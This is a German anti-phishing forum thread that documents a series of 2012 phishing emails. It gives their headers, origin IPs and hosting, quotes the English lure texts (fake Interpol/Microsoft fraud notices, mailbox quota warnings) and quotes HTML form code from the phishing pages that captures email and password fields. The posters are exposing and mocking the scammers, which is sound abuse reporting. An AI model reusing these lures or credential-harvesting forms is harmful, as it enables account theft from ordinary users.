Von PHP hat der Mugu ja auch keine Ahnung, er hat den PHP-Formgenerator benutzt. Reicht wohl nur dazu, einen gecrackten Server-Account zu kaufen...
Druckbare Version
Der einfachen Machart nach zu urteilen, benötigen die Mugus wieder Mail Accounts:
header:01: Received: from server.grupo.alborsgaliano.com (EHLO02: mx1.alborsgaliano.com) [62.15.74.235]03: by mx0.gmx.net (mx020) with SMTP; 10 Jan 2012 xx:xx:xx +010004: Received: from User ([81.149.250.213]) by mx1.alborsgaliano.com with05: Microsoft SMTPSVC(6.0.3790.4675);06: Mon, 9 Jan 2012 xx:xx:xx +0100
IP: 81.149.250.213 ---> host81-149-250-213.in-addr.btopenworld.com
IP: 204.93.211.58 ---> server102.routhost.com/ServercentralZitat:
Dear Internet Users,
There is a current upgrade going on as the internet has so many scams
going on
this days and we are trying to wipe out all fraudulent activities.You
may be a
victim of fraud.
Please click this link below and enter the required information so your
account will be free from internet activities as Microsoft and AOL with all
internet bodies are putting head together to wipe away this activities
caused by
fraudster.
whois:
We are sorry for the trouble and wish to apologized to those whom have
loss alot
from it.
Regards,
Mrs. Lillian Burton
Interpol/Microsoft
Fraudulent Monitor Dept
Im Quelltext findet man dann:
[HTML]<form method="POST" action="asap.php" onSubmit=""
webbot-action="--WEBBOT-SELF--">
<!--webbot bot="SaveResults" S-Email-Format="TEXT/PRE"
S-Email-Address="" B-Email-Label-Fields="TRUE"
B-Email-Subject-From-Field="FALSE" S-Email-Subject="all_logins"
S-Builtin-Fields S-Form-Fields="email passwd --by_Opsix-- "
U-Confirmation-Url="asap.php" startspan --><input name="VTI-GROUP"
value="1" type="hidden"><!--webbot bot="SaveResults" endspan
i-checksum="43406" -->
<p align="left">Email <font
color="#FFFFFF">
<input name="email" size="30" type="text"></font></p>
<p align="left">Password <font color="#FFFFFF">
<input name="passwd" size="30" type="password">
</font></p>
<p align="center"><font color="#FFFFFF"><input value="Submit"
name="B1" type="submit"></font></p>
</form>[/HTML]
Also:
hätte gerne viiieeel Post...
Und weil Google trotz Abuse-Meldung weiterhin Kriminelle unterstützt, kann der Sternchenmugu beruhigt weiter phishen:
header:01: Received: from smtp.qmobile.vn (EHLO HCM-EXCHG-002.abtel.com.vn)02: [115.165.164.106]03: by mx0.gmx.net (mx057) with SMTP; 14 Jan 2012 xx:xx:xx +010004: Received: from User (81.149.250.213) by HCM-EXCHG-002.abtel.com.vn05: (10.1.1.30)06: with Microsoft SMTP Server ID: [ID filtered]07: +0700
IP: 81.149.250.213 ---> host81-149-250-213.in-addr.btopenworld.com
whois:Zitat:
*Dear Internet Users,*
*There is a current upgrade going on as the internet has so many scams
going on
this days and we are trying to wipe out all fraudulent activities.You
may be a
victim of fraud.*
*Please click this link below and enter the required information so your
account will be free from internet activities as Microsoft and AOL with all
internet bodies are putting head together to wipe away this activities
caused by
fraudster.*
IP: 204.93.211.58 ---> server102.routhost.com
Dort dann im Quellcode:
[HTML]<!--webbot bot="SaveResults" S-Email-Format="TEXT/PRE"
S-Email-Address="" B-Email-Label-Fields="TRUE"
B-Email-Subject-From-Field="FALSE" S-Email-Subject="all_logins"
S-Builtin-Fields S-Form-Fields="email passwd --by_Opsix-- "
U-Confirmation-Url="asap.php" startspan --><input name="VTI-GROUP"
value="1" type="hidden"><!--webbot bot="SaveResults" endspan
i-checksum="43406" -->[/HTML]
Man braucht mal wieder neue Postfächer:
header:01: Received: from crystalfs.co.uk (mail.crystal-pbx.abc.net.uk [195.72.48.66])02: by xxxxx (Postfix) with ESMTP ID: [ID filtered]03: for xxxxx; Fri, 3 Feb 2012 xx:xx:xx +0100 (CET)04: Received: from User ([204.188.217.215]) by crystalfs.co.uk with05: Microsoft SMTPSVC(6.0.3790.4675);06: Thu, 2 Feb 2012 xx:xx:xx +0000
IP: 204.188.217.215 ---> SHARKTECH INTERNET SERVICES
Zitat:
Dear Webmail User
We noticed that your Emailaccount is opening in one other location with
network
IP address (94.108.200.195) click _HERE_
whois: to logout the account from
your mail
box and block the IP from login in again from the address because if we
continue
to experience such problem your mail box will be completely closed.
Regards
Webmail Support Copyright [2011] [ Webmail Support Team]. All rights
reserved
Auch hier sind Mugus wieder aktiv:
header:01: Received: from oms-mb01.r1000.mx.aol.com (oms-mb01.r1000.mx.aol.com02: [64.12.102.137])03: by xxxxx (Postfix) with ESMTP ID: [ID filtered]04: for xxxxx; Fri, 16 Mar 2012 xx:xx:xx +0100 (CET)05: Received: from mtaout-db02.r1000.mx.aol.com06: (mtaout-db02.r1000.mx.aol.com [172.29.51.194])07: by oms-mb01.r1000.mx.aol.com (AOL Outbound OMS Interface) with ESMTP id08: 2DB591C000086;09: Fri, 16 Mar 2012 xx:xx:xx -0400 (EDT)10: Received: from User (unknown [190.24.150.251])11: by mtaout-db02.r1000.mx.aol.com (MUA/Third Party Client Interface) with12: ESMTPA ID: [ID filtered]13: Fri, 16 Mar 2012 xx:xx:xx -0400 (EDT)
X-AOL-IP: 190.24.150.251 ---> corporat190-024150251.sta.etb.net.co
Spamhaus meint dazu:
Seit dem 2. 3. online, so blöd kann kein Admin sein, da muss man schon Vorsatz unterstellen.Zitat:
190.24.150.248/29 is listed on the Spamhaus Block List (SBL)
2012-03-02 17:48:30 GMT | SR08 | etb.net.co
advance fee fraud spam origin at fundacion educativa taller5
Likely a trojaned system, used by criminals as an anonymising proxy to inject advance fee fraud ('419') spam into abused SMTP servers.
Zitat:
Sie haben ein neues Konto Nachricht _http://www.dokom21.de/account/profile_
whois:
Wieder ein (bereits fehlgeschlagener) Versuch:
header:01: Received: from newton.feg.unesp.br (newton.feg.unesp.br [200.145.11.2])02: by xxxxx (Postfix) with ESMTP ID: [ID filtered]03: Mon, 26 Mar 2012 xx:xx:xx +0200 (CEST)04: Received: from webmail.feg.unesp.br (localhost.feg.unesp.br [127.0.0.1])05: by newton.feg.unesp.br (Postfix) with ESMTP ID: [ID filtered]06: Mon, 26 Mar 2012 xx:xx:xx -0300 (BRT)07: Received: from 65.254.61.25008: (SquirrelMail authenticated user wcyro)09: by webmail.feg.unesp.br with HTTP;10: Mon, 26 Mar 2012 xx:xx:xx -0300 (BRT)
IP: 65.254.61.250 ---> GNAXNET
header:01: Received: from rfi.fmrp.usp.br (rfi.fmrp.usp.br [143.107.198.161])02: by xxxxx (Postfix) with ESMTP ID: [ID filtered]03: Mon, 26 Mar 2012 xx:xx:xx +0200 (CEST)04: Received: from rfi.fmrp.usp.br (localhost.fmrp.usp.br [127.0.0.1])05: by rfi.fmrp.usp.br (Postfix) with ESMTP ID: [ID filtered]06: Mon, 26 Mar 2012 xx:xx:xx -0300 (BRT)
Zitat:
Dear Account user,
We are updating our database and e-mail account center. We are deleting all
unused E-mail account and create more space for new accounts. To ensure
that
you do not experience service disruption during this period, you need to
click
on the Validation link below and fill in your information:
Validation link:
whois:
You will receive confirmation of a new alphanumeric password that is only
valid during this period, and may be changed by this process. We regret any
inconvenience this may cost you.
Please reply to this message so we can give you better services online with
our new and improved webmail functionality and improvements.
Webmail Upgrade Dept © 2012
Warning Code: ID 67565434.
Die Mugus brauchen wieder Mail-Accounts:
header:01: Received: from outrelay03.libero.it (outrelay03.libero.it [212.52.84.103])02: by xxxxx (Postfix) with ESMTP ID: [ID filtered]03: Wed, 13 Jun 2012 xx:xx:xx +0200 (CEST)
Der Schadlink: whois:Zitat:
Sie werden nicht in der Lage sein zu senden oder zu empfangen neue
E-Mail, bis
Sie Ihre Mailbox-Größe zu erhöhen. Klicken Sie auf Universität
xxxxx/accupgrade
Technischer Support 192.168.0.
IP: 112.78.117.8 ---> sv7.minibird.netowl.jp
Und wieder mal betätigt sich Mugu als Phiski:
header:01: Received: from mout.perfora.net (mout.perfora.net [74.208.4.194])02: (using TLSv1 with cipher RC4-SHA (128/128 bits))03: (No client certificate requested)04: by xxxxx (Postfix) with ESMTPS ID: [ID filtered]05: for xxxxx; Mon, 29 Oct 2012 xx:xx:xx +0100 (CET)06: Received: from winxedgeus02.exchange.xchg (winxedgeus02.lxa.perfora.net07: [172.23.130.34])08: by mrelay.perfora.net (node=mrus3) with ESMTP (Nemesis)09: ID: [ID filtered]10: Received: from winxhubus04.exchange.xchg (172.23.130.36) by11: winxedgeus02.exchange.xchg (172.23.130.34) with Microsoft SMTP Server (TLS)12: ID: [ID filtered]13: Received: from WINXBEUS26.exchange.xchg ([172.23.130.69]) by14: winxhubus04.exchange.xchg ([172.23.130.36]) with mapi; Mon, 29 Oct 201215: xx:xx:xx -0400
IP: 213.174.157.200 ---> dev200.ucoz.netZitat:
Your Mailbox Quota Has Exceeded The Set Quota/Limit Which Is 20GB.You Are
Currently Running On 23GB Due To Hidden Files And Folder On Your
Mailbox. Please
Click the Link Below To Validate Your Mailbox And Increase Your Quota.
CLICK HERE: whois:
Failure To Click This Link And Validate Your Quota May Result In Loss Of
Important Information In Your Mailbox/Or Cause Limited Access To It.
Thanks
System Administrator.
Dort dann ein mittels Formbuddy erstellte Phishing-Seite:
[HTML]<form action="http://www.formbuddy.com/cgi-bin/form.pl" method="post">[/HTML]
IP: 67.222.1.10 ---> host.formbuddydns.com
Und wieder mal verschleiert über Dot.tk. Wo ist der Firmensitz? Natürlich in Amsterdam, dem Sitz von Leaseweb und auch Ripe. Hach, was sind wir doch so liberal....
header:01: Received: from mail-out.iu17.org (mail-out.iu17.org [173.46.220.16])02: by xxxxx (Postfix) with ESMTP ID: [ID filtered]03: for xxxxx; Tue, 30 Oct 2012 xx:xx:xx +0100 (CET)04: Received: from spam.iu17.org (localhost.localdomain [127.0.0.1])05: by spam.iu17.org (Postfix-out) with ESMTP ID: [ID filtered]06: Tue, 30 Oct 2012 xx:xx:xx -0400 (EDT)07: X-Propel-Return-Path: <dulkins [at] IU17.ORG>08: Received: from mail-out.iu17.org ([10.61.0.16])09: by [127.0.0.1] ([127.0.0.1]) (port 7027) (Abaca EPG outproxy filter10: 3.1.1.9638 $Rev: 9577 $)11: ID: [ID filtered]12: Received: from blastexchange.IU17.ORG (blastexchange.iu17.org [10.61.0.7])13: by spam.iu17.org (Postfix-out) with ESMTP ID: [ID filtered]14: Tue, 30 Oct 2012 xx:xx:xx -0400 (EDT)15: Received: from blastexchange.IU17.ORG ([10.61.0.7]) by16: blastexchange.IU17.ORG17: ([10.61.0.7]) with mapi; Tue, 30 Oct 2012 xx:xx:xx -0400
geht per Iframe auf:Zitat:
Your Mailbox Quota Has Exceeded The Set Quota/Limit Which Is 20GB.You Are C=
urrently Running On 23GB Due To Hidden Files And Folder On Your Mailbox. Pl=
ease Click the Link Below To Validate Your Mailbox And Increase Your Quota.
CLICK HERE: whois:
Failure To Click This Link And Validate Your Quota May Result In Loss Of Im=
portant Information In Your Mailbox/Or Cause Limited Access To It.
Thanks
System Administrator.
whois:
IP: 74.63.255.130 ---> 6te-freewebhostingarea-com.6te.net
neuer Versuch:
header:01: Received: from exchange.bisd-tx.org (exchange.bisd-tx.org [64.123.96.67])02: (using TLSv1 with cipher AES128-SHA (128/128 bits))03: (No client certificate requested)04: by xxxxx (Postfix) with ESMTPS ID: [ID filtered]05: for xxxxx; Thu, 1 Nov 2012 xx:xx:xx +0100 (CET)06: Received: from exchange.bisd-tx.local ([fe80::60db:c9fe:c69f:3746]) by07: exchange.bisd-tx.local ([fe80::60db:c9fe:c69f:3746%10]) with mapi; Thu,08: 1 Nov09: 2012 xx:xx:xx -0500
gecrackt:
IP: 69.50.219.228 ---> server2.vrns.netZitat:
Your Mailbox Quota Has Exceeded The Set Quota/Limit Which Is 20GB.You
Are Currently Running On 23GB Due To Hidden Files And Folder On Your
Mailbox. Please Click the Link Below To Validate Your Mailbox And
Increase Your Quota.
CLICK HERE: whois:
Failure To Click This Link And Validate Your Quota May Result In Loss Of
Important Information In Your Mailbox/Or Cause Limited Access To It.
Thanks
System Administrator.
Im Quellext:
[HTML]<!-- saved from url=(0060)http://stuartjohnsons.com/nupgrade/administrator_restore.htm -->[/HTML]
zudem steht der Hosenlatz offen:
whois: